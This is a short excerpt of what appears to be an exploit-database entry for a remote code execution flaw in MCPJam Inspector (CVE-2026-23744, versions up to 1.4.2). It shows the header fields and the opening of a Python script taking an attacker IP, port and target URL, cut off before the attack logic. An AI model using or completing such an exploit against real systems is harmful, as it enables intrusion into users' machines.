Skip to content
Exploit Title: MCPJam Inspector - Remote Code Execution Date: 07/03/2026 Exploit Author: Diamorphine Vendor Homepage: https://www.mcpjam.com/ Software Link: https://github.com/MCPJam Version: <=1.4.2 Tested on: Debian CVE : CVE-2026-23744 import asyncio import httpx import argparse from urllib.parse import urljoin async def main(attacker_ip, attacker_port, url): async with httpx.AsyncClient(verify...